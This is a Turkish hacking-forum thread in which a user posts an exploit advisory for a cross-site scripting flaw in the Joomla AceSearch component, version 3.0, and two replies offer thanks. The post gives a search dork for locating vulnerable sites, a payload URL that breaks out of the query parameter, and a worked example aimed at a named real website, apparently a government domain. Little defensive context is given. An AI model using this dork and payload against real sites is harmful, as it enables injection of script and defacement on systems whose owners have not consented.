Konuyu Oyla:
  • Toplam: 3 Oy - Ortalama: 1.33
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Joomla Component AceSearch Cross Site Scripting
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 60 / 100
Rep Sayısı: 121
Mesaj Sayısı: 5584
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
Joomla Component AceSearch Cross Site Scripting
20.01.2014 10:35
#Title : Joomla Component AceSearch Cross Site Scripting
#Author : cyberizm
#Date : 5 January 2014
#Category : Web Applications
#Product : http://www.joomace.net/joomla-extensions/acesearch/
#Version : 3.0
#Type : PHP
#Thanks : DaRKNeSS
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : Cross Site Scripting
#Dork :
inurl:component/acesearch/



Cross Site Scripting

PHP Kod:
http://site-target/component/acesearch/search?query=”>[XSS] 
Use “> for Bypass Cross Site Scripting

Example :
Kod:
http://kpi.go.id/index.php/component/acesearch/search?query=”><h1>DaRKNeSS</h1>
(Bu konu en son: 20.01.2014 Tarihinde, Saat: 10:36 düzenlenmiştir. Düzenleyen: DaRKNeSS.)


Alinti
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 60 / 100
Rep Sayısı:
Mesaj Sayısı: 5584
Üyelik Tarihi: 11.08.2013
     
Yorum: #2
Cvp: Joomla Component AceSearch Cross Site Scripting
20.01.2014 13:50
eline sağlık abi Exciting


Alinti
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 60 / 100
Rep Sayısı:
Mesaj Sayısı: 5584
Üyelik Tarihi: 11.08.2013
     
Yorum: #3
Cvp: Joomla Component AceSearch Cross Site Scripting
21.01.2014 19:16
Eyvallahh


Alinti



1 Ziyaretçi